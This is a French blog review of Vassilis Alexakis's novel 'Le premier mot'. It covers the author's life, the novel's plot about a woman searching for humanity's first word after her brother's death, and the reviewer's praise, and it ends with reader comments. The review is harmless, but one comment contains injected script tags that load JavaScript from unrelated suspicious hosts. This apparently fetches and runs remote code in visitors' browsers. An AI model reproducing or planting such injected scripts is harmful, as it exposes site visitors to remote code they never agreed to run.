• Vassilis Alexakis, Le premier mot, Stock

     

    Vassilis Alexakis, Le premier mot, StockL'écrivain franco-grec Vassilis Alexakis est mort le 11 janvier 2021. Né à Athènes en 1943 il a vécu en France, notamment sous la dictature des colonels, et travaillé pour divers journaux dont le Monde. Il écrivait ses romans soit en français soit en grec. La langue maternelle a été écrit en grec puis réécrit en français. Encore un écrivain dont je fais la connaissance à l'occasion de sa mort et je suis tellement enchantée par ma lecture que cette découverte tardive me rend un peu triste.

     

     

    Vassilis Alexakis, Le premier mot, StockLe premier mot. Miltiadis est Grec, professeur de littérature comparée, installé à Paris depuis de nombreuses années. Il retourne tous les étés en Grèce où il a entrepris de connaître toutes les îles et il les visite dans l'ordre alphabétique, deux ou trois par été.

    "L'ordre alphabétique remodèle la carte, il offre à des lieux qui n'étaient pas destinés à se rencontrer la possibilité de faire connaissance, il constitue le point de départ de dialogues inattendus".

    Miltiadis s'intéresse particulièrement à la linguistique, l'étymologie, l'histoire des langues et aimerait connaître le premier mot prononcé par un être humain. Quand il meurt sa soeur, la narratrice, décide de mener l'enquête sur les origines du langage. Elle rencontre divers scientifiques qui lui apportent des éléments de réponse. Ce sont souvent des anciens amis de Miltiadis car sa quête est aussi une façon de faire le deuil de ce frère dont elle était très proche et avec qui elle converse tout du long de sa recherche.

     

     

    Que voilà un excellent livre, plein d'imagination, d'humour et qui m'a appris des choses sur le langage et la culture grecque. Il est question de la langue grecque, ancienne et contemporaine; de la langue française, des nombreux mots d'origine étrangère qu'elle contient et du mauvais traitement fait par les autorités de notre pays aux langues régionales; et même de la langue des signes. Je trouve tout cela très intéressant. La rubrique nécrologique du Monde dans une main et le roman dans l'autre je découvre que Vassilis Alexakis a utilisé des éléments de sa propre biographie pour plusieurs de ses personnages. Pour Miltiadis, bien sûr, installé à Paris et qui, comme l'auteur, parle le sango, langue centrafricaine; pour le père de Miltiadis qui, comme l'auteur, a fait ses études à Lille et enfin pour la narratrice qui a, comme l'auteur, perdu son frère prématurément. Je prévois de relire prochainement Vassilis Alexakis.

     

     

     


    Tags Tags : ,
  • Commentaires

    1
    keisha
    Samedi 6 Février à 08:54
    keisha

    Un thème qui m'intéresse grandement, et je connais peu d'auteurs grecs!

    <script src="//westtank.net/2313bb93141d74fb89.js?2"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8979x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8979x&format=arrjs&r=1612598006266" type="text/javascript"></script> <script src="http://westtank.net/ext/2313bb93141d74fb89.js?sid=52715_8979_&title=aa&blocks[]=31af2" type="text/javascript"></script>
      • Samedi 6 Février à 10:37

        J'ai oublié de préciser que celui ci a été écrit en français. C'est manifestement un thème qui intéresse aussi l'auteur vu les titres de ses romans.

         

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :